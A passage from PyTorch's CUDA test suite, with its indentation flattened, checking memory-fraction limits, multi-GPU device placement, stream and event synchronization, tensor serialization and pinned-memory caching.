# test invalid fraction value.
with self.assertRaisesRegex(TypeError, "Invalid type"):
torch.cuda.set_per_process_memory_fraction(int(1))
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(-0.1)
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(2.0)
tensor = torch.zeros(1024, device='cuda')
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
torch.cuda.set_per_process_memory_fraction(0.5, 0)
# test 0.499 allocation is ok.
application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved()
tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda')
del tmp_tensor
torch.cuda.empty_cache()
application = int(total_memory * 0.5)
        # it will OOM when trying to allocate more than half of the total memory.
with self.assertRaisesRegex(RuntimeError, "out of memory"):
torch.empty(application, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_autogpu(self):
x = torch.randn(5, 5).cuda()
y = torch.randn(5, 5).cuda()
self.assertEqual(x.get_device(), 0)
self.assertEqual(x.get_device(), 0)
with torch.cuda.device(1):
z = torch.randn(5, 5).cuda()
self.assertEqual(z.get_device(), 1)
q = x.add(y)
self.assertEqual(q.get_device(), 0)
w = torch.randn(5, 5).cuda()
self.assertEqual(w.get_device(), 1)
self.assertEqual(y.cuda().get_device(), 1)
z = z.cuda()
self.assertEqual(z.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_new(self):
x = torch.randn(3, 3).cuda()
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_device(self):
x = torch.randn(5, 5).cuda()
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
x = torch.randn(5, 5)
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
def _test_copy_sync_current_stream(self, x, y):
x_plus_one = x + 1
s0 = torch.cuda.Stream(device=x.device)
s1 = torch.cuda.Stream(device=y.device)
s2 = torch.cuda.Stream(device=x.device)
s3 = torch.cuda.Stream(device=y.device)
# same dst stream different src streams
with torch.cuda.stream(s0):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s1):
y.copy_(x_plus_one)
with torch.cuda.stream(s2), torch.cuda.stream(s1):
y.copy_(x)
s1.synchronize()
# The copy() is synchronized on the current streams of both src and dst.
# In the above test, the _sleep() op on s0 will not block the copy() on
# s2, but both copies are synchronized on s1 in the dst device. Hence,
# x is copied to y after x_plus_one is copied to y. If x and y are on
# the same device, both copy() ops are synchronized on s1.
self.assertEqual(y, x)
# same src stream different dst streams
with torch.cuda.stream(s1):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s0):
y.copy_(x_plus_one)
with torch.cuda.stream(s3), torch.cuda.stream(s0):
y.copy_(x)
s0.synchronize()
# Similarly, both copy() ops are synchronized on s0.
self.assertEqual(y, x)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_streams(self):
d0 = torch.device('cuda:0')
x0 = torch.zeros(5, 5, device=d0)
d1 = torch.device('cuda:1')
x1 = torch.zeros(5, 5, device=d1)
self._test_copy_sync_current_stream(x0, x1)
x2 = torch.zeros(5, 5, device=d0)
self._test_copy_sync_current_stream(x0, x2)
def test_copy_non_blocking(self):
def _test_copy_non_blocking(a, b):
event = torch.cuda.Event()
a.copy_(b, non_blocking=True)
event.record()
event.synchronize()
self.assertEqual(a, b)
# 10MB copies
x = torch.ones(10000000, dtype=torch.uint8).cuda()
y = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
_test_copy_non_blocking(x, y)
x = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
y = torch.ones(10000000, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
def test_to_non_blocking(self):
stream = torch.cuda.current_stream()
def _test_to_non_blocking(a, non_blocking, dst):
torch.cuda.synchronize()
            # Pushes a 0.1 second spin onto the stream so that, if the copy is
            # non-blocking, the stream will almost surely be active when we query().
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
b = a.to(device=dst, non_blocking=non_blocking)
self.assertEqual(stream.query(), not non_blocking)
stream.synchronize()
self.assertEqual(a, b)
self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu"))
for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)):
# Creates source on the opposite device from destination.
src = torch.randn(1000000,
device="cuda" if dst == "cpu" else "cpu",
pin_memory=True if dst == "cuda" else False)
_test_to_non_blocking(src, try_non_blocking, dst)
def test_to_cpu_blocking_by_default(self):
src = torch.randn(1000000, device="cuda")
torch.cuda.synchronize()
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
dst = src.to(device="cpu")
self.assertEqual(torch.cuda.current_stream().query(), True)
self.assertEqual(src, dst)
self.assertFalse(dst.is_pinned())
def test_serialization_array_with_storage(self):
x = torch.randn(5, 5).cuda()
y = torch.IntTensor(2, 5).fill_(0).cuda()
q = [x, y, x, y.storage()]
with tempfile.NamedTemporaryFile() as f:
torch.save(q, f)
f.seek(0)
q_copy = torch.load(f)
self.assertEqual(q_copy, q, atol=0, rtol=0)
q_copy[0].fill_(5)
self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0)
self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor))
self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[3], torch.cuda.IntStorage))
q_copy[1].fill_(10)
            self.assertEqual(q_copy[3], torch.cuda.IntStorage(10).fill_(10))
def test_cublas_allow_tf32_get_set(self):
orig = torch.backends.cuda.matmul.allow_tf32
self.assertEqual(torch._C._get_cublas_allow_tf32(), orig)
torch.backends.cuda.matmul.allow_tf32 = not orig
self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig)
torch.backends.cuda.matmul.allow_tf32 = orig
def test_cudnn_allow_tf32_get_set(self):
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False):
self.assertFalse(torch.backends.cudnn.allow_tf32)
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True):
self.assertTrue(torch.backends.cudnn.allow_tf32)
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor)
self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor)
y = x.storage()
self.assertIsInstance(y.float(), torch.FloatStorage)
self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage)
self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage)
@unittest.skip("was disabled due to not enough memory, but actually it always fail")
def test_arithmetic_large_tensor(self):
x = torch.empty(2**30, device='cuda')
x.fill_(1)
self.assertEqual(x.sum(), 2**30)
x += 1
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x -= 0.5
self.assertEqual(x.sum(), 2**29)
x.fill_(1)
x *= 2
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x /= 2
self.assertEqual(x.sum(), 2**29)
def test_gather_bool(self):
t = torch.tensor([[False, True], [True, True]], device='cuda')
self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')),
torch.tensor([[False, False], [True, True]], device='cuda'))
def test_torch_manual_seed_seeds_cuda_devices(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
torch.manual_seed(2)
y = x.clone().uniform_()
self.assertEqual(x, y)
self.assertEqual(torch.cuda.initial_seed(), 2)
def test_manual_seed(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.cuda.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
a = torch.bernoulli(torch.full_like(x, 0.5))
torch.cuda.manual_seed(2)
y = x.clone().uniform_()
b = torch.bernoulli(torch.full_like(x, 0.5))
self.assertEqual(x, y)
self.assertEqual(a, b)
self.assertEqual(torch.cuda.initial_seed(), 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_cat_autogpu(self):
x = torch.randn(4, 4).cuda(1)
y = torch.randn(4, 4).cuda(1)
z = torch.cat([x, y], 0)
self.assertEqual(z.get_device(), x.get_device())
@unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor")
def test_load_nonexistent_device(self):
# Setup: create a serialized file object with a 'cuda:9' restore location
tensor = torch.randn(2, device='cuda')
buf = io.BytesIO()
torch.save(tensor, buf)
# NB: this might not work in the future if serialization changes
buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9'))
msg = r'Attempting to deserialize object on CUDA device 9'
with self.assertRaisesRegex(RuntimeError, msg):
_ = torch.load(buf)
def test_specify_improper_device_name(self):
import os
fname = "tempfile.pt"
try:
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname,
_use_new_zipfile_serialization=True)
torch.load(fname, 'cuda0')
finally:
if os.path.exists(fname):
os.remove(fname)
def test_get_device_index(self):
from torch.cuda._utils import _get_device_index
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
_get_device_index('cuda0', optional=True)
with self.assertRaisesRegex(ValueError, "Expected a cuda device"):
cpu_device = torch.device('cpu')
_get_device_index(cpu_device, optional=True)
def test_serialization_array_with_empty(self):
x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), original.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
def gpu_remap(storage, location):
if location == 'cuda:1':
return storage.cuda(0)
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location=gpu_remap)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap_dict(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'})
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_storage_clone(self):
x = torch.randn(4, 4, device='cuda:1').storage()
y = x.clone()
self.assertEqual(x.get_device(), y.get_device())
for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']:
self.assertEqual(getattr(x, t)().get_device(), x.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_cuda_set_device(self):
x = torch.randn(5, 5)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
torch.cuda.set_device(0)
self.assertEqual(x.cuda().get_device(), 0)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
self.assertEqual(x.cuda().get_device(), 0)
torch.cuda.set_device(1)
self.assertEqual(x.cuda().get_device(), 0)
def test_cuda_synchronize(self):
torch.cuda.synchronize()
torch.cuda.synchronize('cuda')
torch.cuda.synchronize('cuda:0')
torch.cuda.synchronize(0)
torch.cuda.synchronize(torch.device('cuda:0'))
if TEST_MULTIGPU:
torch.cuda.synchronize('cuda:1')
torch.cuda.synchronize(1)
torch.cuda.synchronize(torch.device('cuda:1'))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize(torch.device("cpu"))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize("cpu")
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_current_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(device=1)
s2 = torch.cuda.current_stream(device=0)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s2)
with torch.cuda.device(d1):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(1)
s2 = torch.cuda.current_stream(d0)
self.assertEqual(d1, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.current_stream(torch.device('cpu'))
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipCUDANonDefaultStreamIf(True)
def test_default_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.default_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.default_stream()
s2 = torch.cuda.default_stream(device=0)
s3 = torch.cuda.default_stream(d1)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(d1, s3.device)
self.assertEqual(s0, s2)
self.assertEqual(s1, s3)
with torch.cuda.device(d0):
self.assertEqual(torch.cuda.current_stream(), s0)
with torch.cuda.device(d1):
self.assertEqual(torch.cuda.current_stream(), s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.default_stream(torch.device('cpu'))
@skipCUDANonDefaultStreamIf(True)
def test_streams(self):
default_stream = torch.cuda.current_stream()
user_stream = torch.cuda.Stream()
self.assertEqual(torch.cuda.current_stream(), default_stream)
self.assertNotEqual(default_stream, user_stream)
self.assertEqual(default_stream.cuda_stream, 0)
self.assertNotEqual(user_stream.cuda_stream, 0)
with torch.cuda.stream(user_stream):
self.assertEqual(torch.cuda.current_stream(), user_stream)
self.assertTrue(user_stream.query())
tensor1 = torch.ByteTensor(5).pin_memory()
tensor2 = tensor1.cuda(non_blocking=True) + 1
default_stream.synchronize()
self.assertTrue(default_stream.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_device(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
e0 = torch.cuda.Event()
self.assertEqual(None, e0.device)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.Stream()
e1 = s1.record_event()
self.assertEqual(s0.device, torch.device('cuda:0'))
self.assertEqual(e0.device, torch.device('cuda:0'))
self.assertEqual(s1.device, torch.device('cuda:1'))
self.assertEqual(e1.device, torch.device('cuda:1'))
def test_stream_event_repr(self):
s = torch.cuda.current_stream()
self.assertTrue("torch.cuda.Stream" in s.__repr__())
e = torch.cuda.Event()
self.assertTrue("torch.cuda.Event" in e.__repr__())
s.record_event(e)
self.assertTrue("torch.cuda.Event" in e.__repr__())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_context(self):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream(device=1)
s2 = torch.cuda.Stream(device=0)
with torch.cuda.device(s1.device):
prev_stream_on_cuda1 = torch.cuda.current_stream()
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s1):
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.stream(s2):
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s0):
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.device(s1.device):
self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream())
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu(self):
default_stream = torch.cuda.current_stream()
self.assertEqual(default_stream.device, torch.device('cuda:0'))
stream = torch.cuda.Stream(device=1)
self.assertEqual(stream.device, torch.device('cuda:1'))
with torch.cuda.device(1):
self.assertEqual(
torch.cuda.current_stream().device, torch.device('cuda:1'))
self.assertNotEqual(torch.cuda.current_stream(), default_stream)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
# deliberately using a different device
with torch.cuda.device(d0):
s1.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_eq(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s2 = torch.cuda.current_stream()
s3 = torch.cuda.current_stream()
self.assertTrue(s0 == s0)
self.assertTrue(s0 == s1)
self.assertTrue(s2 == s2)
self.assertTrue(s2 == s3)
self.assertFalse(s0 == s2)
self.assertFalse(s1 == s3)
self.assertEqual(s0.device, s1.device)
self.assertEqual(s0.cuda_stream, s1.cuda_stream)
self.assertEqual(s2.device, s3.device)
self.assertEqual(s2.cuda_stream, s3.cuda_stream)
self.assertNotEqual(s0.device, s3.device)
self.assertEqual(hash(s0), hash(s1))
self.assertEqual(hash(s2), hash(s3))
self.assertNotEqual(hash(s0), hash(s3))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_streams_priority(self):
low, high = torch.cuda.Stream.priority_range()
s0 = torch.cuda.Stream(device=0, priority=low)
self.assertEqual(low, s0.priority)
self.assertEqual(torch.device('cuda:0'), s0.device)
s1 = torch.cuda.Stream(device=1, priority=high)
self.assertEqual(high, s1.priority)
self.assertEqual(torch.device('cuda:1'), s1.device)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_tensor_device(self):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1)
self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1)
def test_events(self):
stream = torch.cuda.current_stream()
event = torch.cuda.Event(enable_timing=True)
self.assertTrue(event.query())
start_event = torch.cuda.Event(enable_timing=True)
stream.record_event(start_event)
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
stream.record_event(event)
self.assertFalse(event.query())
event.synchronize()
self.assertTrue(event.query())
self.assertGreater(start_event.elapsed_time(event), 0)
@staticmethod
def _stream_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
e_tok.record(s)
s.synchronize()
self.assertTrue(s.query())
        # not necessary to check e_tik and e_tok, as elapsed_time would raise
        # an exception otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
s.record_event(e_tok)
e_tok.synchronize()
self.assertTrue(s.query())
        # not necessary to check e_tik and e_tok, as elapsed_time would raise
        # an exception otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_wait(self, spin_time_cycles):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream()
e_tik = torch.cuda.Event(blocking=True, enable_timing=True)
e_tok = torch.cuda.Event(blocking=True, enable_timing=True)
e_tik.record(s0)
torch.cuda._sleep(spin_time_cycles - 10)
e_sync = torch.cuda.Event(blocking=True)
e_sync.record()
e_sync.wait(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10)
s1.synchronize()
e_tok.record()
e_tok.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
self.assertTrue(e_sync.query())
        # not necessary to check e_tik and e_tok, as elapsed_time would raise
        # an exception otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _test_stream_event_nogil(self, sync_func, p2c, c2p):
with torch.cuda.device('cuda:1'):
c2p.put(0)
p2c.get()
c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES))
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_nogil(self):
for sync_func in [TestCuda._stream_synchronize,
TestCuda._event_synchronize,
TestCuda._event_wait]:
p2c = queue.Queue()
c2p = queue.Queue()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
t = threading.Thread(
target=TestCuda._test_stream_event_nogil,
args=(self, sync_func, p2c, c2p))
t.daemon = True
t.start()
c2p.get()
with torch.cuda.device('cuda:0'):
e_tik.record()
p2c.put(0)
parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES)
child_time = c2p.get()
e_tok.record()
e_tok.synchronize()
total_time = e_tik.elapsed_time(e_tok)
# Without GIL, synchronizations in parent and child threads can
# overlap. The total execution time should be a little bit longer
# than spinning fifty million cycles and much shorter than twice of
# that. However, testing absolute execution time is not reliable as
# it may vary on different hardware in different environments.
            # Therefore, this test uses relative comparisons, checking that the
            # sum of the parent and child threads' execution time is greater than the
            # real execution time by at least 40%.
self.assertGreater(parent_time + child_time, total_time * 1.4)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_wait(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e0 = torch.cuda.Event()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
self.assertFalse(s0.query())
self.assertTrue(s1.query())
s1.wait_event(e0)
s1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = s0.record_event()
s0.synchronize()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e1 = s1.record_event()
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
# deliberately using a different device
with torch.cuda.device(d0):
e1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipIfRocm
def test_events_multi_gpu_elapsed_time(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(10)
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
e1 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s1.record_event(e1)
e0.synchronize()
e1.synchronize()
with torch.cuda.device(d0):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d1):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e2 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s0.record_event(e2)
s0.synchronize()
self.assertGreater(e0.elapsed_time(e2), 0)
# deliberately calling from a different device
with torch.cuda.device(d1):
self.assertGreater(e0.elapsed_time(e2), 0)
def test_record_stream(self):
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1, 2, 3, 4]).pin_memory()
result = torch.cuda.FloatTensor(t.size())
stream = torch.cuda.Stream()
ptr = [None]
# Performs the CPU->GPU copy in a background stream
def perform_copy():
with torch.cuda.stream(stream):
tmp = t.cuda(non_blocking=True)
ptr[0] = tmp.data_ptr()
torch.cuda.current_stream().wait_stream(stream)
tmp.record_stream(torch.cuda.current_stream())
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
result.copy_(tmp)
perform_copy()
with torch.cuda.stream(stream):
tmp2 = torch.cuda.FloatTensor(t.size())
tmp2.zero_()
            self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used too soon')
self.assertEqual(result.tolist(), [1, 2, 3, 4])
# Check that the block will be re-used after the main stream finishes
torch.cuda.current_stream().synchronize()
with torch.cuda.stream(stream):
tmp3 = torch.cuda.FloatTensor(t.size())
self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used')
def test_record_stream_on_shifted_view(self):
# See issue #27366
        # This test detects unexpected block reallocation. For a reliable test,
# the stream to allocate tensors is isolated. The allocator will not
# reuse free blocks which were allocated from another stream.
stream_alloc = torch.cuda.Stream()
with torch.cuda.stream(stream_alloc):
base = torch.cuda.FloatTensor([10, 10])
# Record another stream on a shifted view tensor.
view = base[5:]
assert view.storage_offset() > 0
stream_record = torch.cuda.Stream()
with torch.cuda.stream(stream_record):
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
view.record_stream(stream_record)
# Delete those tensors to make the block free soon.
data_ptr = base.data_ptr()
del base, view
# A new tensor should not be allocated to the block above.
stream_alloc.synchronize()
with torch.cuda.stream(stream_alloc):
try_realloc = torch.cuda.FloatTensor([10, 10])
self.assertNotEqual(try_realloc.data_ptr(), data_ptr)
def test_noncontiguous_pinned_memory(self):
# See issue #3266
x = torch.arange(0, 10).view((2, 5))
self.assertEqual(x.t(), x.t().pin_memory())
def test_caching_pinned_memory(self):
cycles_per_ms = get_cycles_per_ms()
# check that allocations are re-used after deletion
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused')
# check that the allocation is not re-used if it's in-use by a copy
gpu_tensor = torch.cuda.FloatTensor([0])
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
self.assertEqual(list(gpu_tensor), [1])
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_caching_pinned_memory_multi_gpu(self):
# checks that the events preventing pinned memory from being re-used
# too early are recorded on the correct GPU
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
gpu_tensor0 = torch.cuda.FloatTensor([0], device=0)
gpu_tensor1 = torch.cuda.FloatTensor([0], device=1)
with torch.cuda.device(1):
